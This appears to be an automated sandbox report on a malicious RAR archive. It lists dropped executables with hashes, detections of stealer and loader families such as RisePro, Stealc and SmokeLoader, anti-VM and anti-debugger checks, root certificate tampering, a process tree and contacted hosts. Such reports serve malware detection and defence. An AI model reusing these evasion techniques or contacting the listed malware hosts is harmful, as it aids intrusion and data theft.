memory/5980-866-0x0000000001C20000-0x0000000001C21000-memory.dmp

memory/5980-864-0x0000000001C10000-0x0000000001C11000-memory.dmp

memory/1856-863-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 f656f216df8183e49e9aca6699613b90
SHA1 47f02aa20960384c421c2fb5b2c8bc70859424ea
SHA256 17cfe329e9a5e2406385479b2cfafb11082f039797a3483c6d7ae00429b69efc
SHA512 6c97dcc93a2f592193f39f54946e441e205e07fc527de2f396f288e5c920a7171c909d72c78d97ecb6c3c4fe2ad05620efcdd4225a77122840a7e2a1a131a666

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 e9bbe2a17f17f189b57d897e82ca168c
SHA1 75638f84e3db80f805352cb902268db3e5f8d0e6
SHA256 12b54437e0a095fcccf08f11c31dce1faebed94a66742025966ca350bfbf8dc0
SHA512 863874727232e942fb6d45ea7ce1694efa2a414327e8a823f932f8fc72db149bf5d9cfc3e7e400ce621ee24ca422170080e37fa7adde3830c4c50b0d146e0911

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 efd179f6a8d0e8b37827201be10ea90d
SHA1 7947ce4ddc66740d251fc40ad41a9fda2cae5180
SHA256 a75002ba5bb8cfe3d27aa802a8b279a6043ebc67cf142c997e3f3eedada29133
SHA512 4549b7506e21f1ff7f0242261f7d1ff5d2bc1abc40a1a1d7f2693f3082d2c7d5e1e206a275e8ea6b9cfcab151b2ea722939fd0ac1fa7edbb8ce3bf817ce814f8

memory/4748-855-0x0000000000400000-0x0000000002D3F000-memory.dmp

memory/3608-878-0x0000000000400000-0x000000000066F000-memory.dmp

memory/2460-865-0x0000000000400000-0x000000000311F000-memory.dmp

memory/3608-884-0x0000000000400000-0x000000000066F000-memory.dmp

memory/4316-880-0x00000000000B0000-0x0000000000D42000-memory.dmp

memory/2568-881-0x0000000000780000-0x0000000000D37000-memory.dmp

memory/5972-893-0x00000000007A0000-0x0000000000DB2000-memory.dmp

memory/4748-886-0x0000000000400000-0x0000000002D3F000-memory.dmp

memory/5096-895-0x00000000728A0000-0x0000000073050000-memory.dmp

memory/6088-901-0x00000000005E0000-0x00000000005E1000-memory.dmp

memory/2868-910-0x0000000002FDE000-0x0000000002FF3000-memory.dmp

memory/2868-912-0x0000000002E90000-0x0000000002E9B000-memory.dmp

memory/5972-902-0x00000000007A0000-0x0000000000DB2000-memory.dmp

memory/3608-894-0x0000000000400000-0x000000000066F000-memory.dmp

memory/5972-896-0x00000000007A0000-0x0000000000DB2000-memory.dmp

memory/2868-922-0x0000000000400000-0x0000000002D3C000-memory.dmp

C:\Windows\System32\GroupPolicy\GPT.INI

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512 ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

memory/5972-968-0x0000000001320000-0x0000000001321000-memory.dmp

memory/5948-978-0x0000000004AE0000-0x0000000004B16000-memory.dmp

memory/5948-981-0x0000000005150000-0x0000000005778000-memory.dmp

memory/3608-989-0x0000000000400000-0x000000000066F000-memory.dmp

memory/5972-988-0x00000000007A0000-0x0000000000DB2000-memory.dmp

C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe

MD5 c62111e224ffd51eb32967e3168fa39a
SHA1 284474830f72dab6c29ce67cfcc4db513e10560b
SHA256 3483695dadfe58b7f2df246272d9f532f28e3588d77fc61c0fa686ff2b8d3531
SHA512 38bdd09f87cf22837fac0b34209792e5509177b51ed123b01f8f6870b812c958343c01b39a79d980aa936c3c818834a30a6025c28adc2146b7f9182f8944df6b

memory/5948-991-0x0000000005820000-0x0000000005842000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43hc2bq5.k3b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5948-998-0x00000000059C0000-0x0000000005A26000-memory.dmp

memory/5948-1004-0x0000000005B30000-0x0000000005B96000-memory.dmp

memory/2460-1008-0x0000000004DC0000-0x00000000051C3000-memory.dmp

memory/5948-1012-0x00000000060A0000-0x00000000060BE000-memory.dmp

memory/5948-1017-0x0000000006640000-0x000000000668C000-memory.dmp

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

MD5 84e5ccdfbdfd9d92456c890e6d8641d4
SHA1 bc1f99c3a86a6a3258e6baa57c26be3a4403146e
SHA256 d4b9f4354252a9c203a211d8d600113f9d236ecca6234f43b5aa02350b5b24cc
SHA512 5f57e132b811e83f167f4b624397262b83982c9781dd05cba20bd2de798fcf1fd010c268060fcdf5601d5c2af1d4a61c2ff8a3ed659a25ceb6a3ef1034b8cf4c

memory/844-1027-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2460-1030-0x00000000051D0000-0x0000000005ABB000-memory.dmp

memory/5684-1032-0x00000000020C0000-0x00000000020C1000-memory.dmp

memory/2568-1033-0x0000000004B00000-0x0000000004B01000-memory.dmp

memory/2568-1035-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

memory/2568-1034-0x0000000004B70000-0x0000000004B71000-memory.dmp

memory/2568-1037-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

memory/2568-1038-0x0000000004B40000-0x0000000004B41000-memory.dmp

memory/2568-1039-0x0000000004B90000-0x0000000004B91000-memory.dmp

memory/2568-1040-0x0000000004B20000-0x0000000004B21000-memory.dmp

memory/2568-1041-0x0000000004B50000-0x0000000004B51000-memory.dmp

memory/2568-1042-0x0000000004B80000-0x0000000004B81000-memory.dmp

memory/2568-1043-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

memory/2568-1036-0x0000000000780000-0x0000000000D37000-memory.dmp

memory/5392-1031-0x0000000000400000-0x000000000311F000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 fef383de063d9a06313fef7706559216
SHA1 ae4bc1e98fd31ef81be55445e68fadb1e12b9d2e
SHA256 a07223dcca324c67db2503a62e049839577f5bdacf3ded6bd2454aafbb7fe649
SHA512 f3c3816940245957764a17f708cef9822188669407dfee4faf967fa6831391d2c3a5041054b6238c986c802b391c45089502598d46d558988c16f4c0f271107f

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d3303bae634c7937c8eee59ea661dcad
SHA1 bff96bcfc6fb4139b39e2075c09f5d983fd050ba
SHA256 248642cd9eb6166159c7e8286aab2578ad438d874594c08080358a9b596cda47
SHA512 9b2710e09994248bb8a66dbf1dd308796c2054997a28d54bf15d3e17e5a8bbb915fa9aec6e0fdd6c676045e573e1238b4b59d17450a3984c95b07d5817aa4e33

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c8bb0c9748e5e42643c71507bb3e5b96
SHA1 8eaa842c7787b73948bd3d6854f5efbd66fe7ebb
SHA256 0673bce96a64d18933b66e03d7618a0acad90f8351f57a2a671f2b7dd150ab21
SHA512 0e98345388fb0c8ed469188d175e8128d40c89f6673303958db99f5710851f448e6aa3c541a04ce113a718bf879932eb22f407f09326af580ab47abfa263ac6a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2ce63f7b-a340-4812-bb97-ddbf69b20b87.tmp

MD5 50302e65cb47e38c6996a173d92d04e3
SHA1 a8962ca20660a13d9965d5146237853619aa986f
SHA256 390e3ba7f27c9a8d92dbc8c716f799b785329d596a4718b8fc8bd7c7a5ac1ada
SHA512 92ee7f2b445113e00e2ba5d5aa2cb5125d56daeb2059b213b635dd9052d4d4fd45f65a1e4cb80e5dcf415790f4b583cab8bb2b9ffa9d00a8ef31bb1d17cea78d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

MD5 a5ce3aba68bdb438e98b1d0c70a3d95c
SHA1 013f5aa9057bf0b3c0c24824de9d075434501354
SHA256 9b860be98a046ea97a7f67b006e0b1bc9ab7731dd2a0f3a9fd3d710f6c43278a
SHA512 7446f1256873b51a59b9d2d3498cef5a41dbce55864c2a5fb8cb7d25f7d6e6d8ea249d551a45b75d99b1ad0d6fb4b5e4544e5ca77bcd627717d6598b5f566a79

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:49

Platform

win7-20240221-en

Max time kernel

51s

Max time network

213s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\file_release_4.rar"

C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe"

C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe

"C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe"

C:\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe

"C:\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe"

C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe

"C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe"

C:\Users\Admin\Documents\GuardFox\1eXwW8W0LQr4lKFVVhJkmQ9O.exe

"C:\Users\Admin\Documents\GuardFox\1eXwW8W0LQr4lKFVVhJkmQ9O.exe"

C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe

"C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe"

C:\Users\Admin\Documents\GuardFox\grJJOXisL53B7lk88iWMuUJd.exe

"C:\Users\Admin\Documents\GuardFox\grJJOXisL53B7lk88iWMuUJd.exe"

C:\Users\Admin\Documents\GuardFox\uK5XIHQ709h40q_3RXOWxPKt.exe

"C:\Users\Admin\Documents\GuardFox\uK5XIHQ709h40q_3RXOWxPKt.exe"

C:\Users\Admin\Documents\GuardFox\FAQhhDdJvDUvJ7Gg2HOVMW2l.exe

"C:\Users\Admin\Documents\GuardFox\FAQhhDdJvDUvJ7Gg2HOVMW2l.exe"

C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe

"C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe"

C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe

"C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe"

C:\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp" /SL5="$40186,4124890,54272,C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe"

C:\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe

.\Install.exe /MFFdidt "525403" /S

C:\Users\Admin\AppData\Local\Temp\FF07.exe

C:\Users\Admin\AppData\Local\Temp\FF07.exe

C:\Users\Admin\AppData\Local\Temp\FF07.exe

C:\Users\Admin\AppData\Local\Temp\FF07.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

Network

Country Destination Domain Proto
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
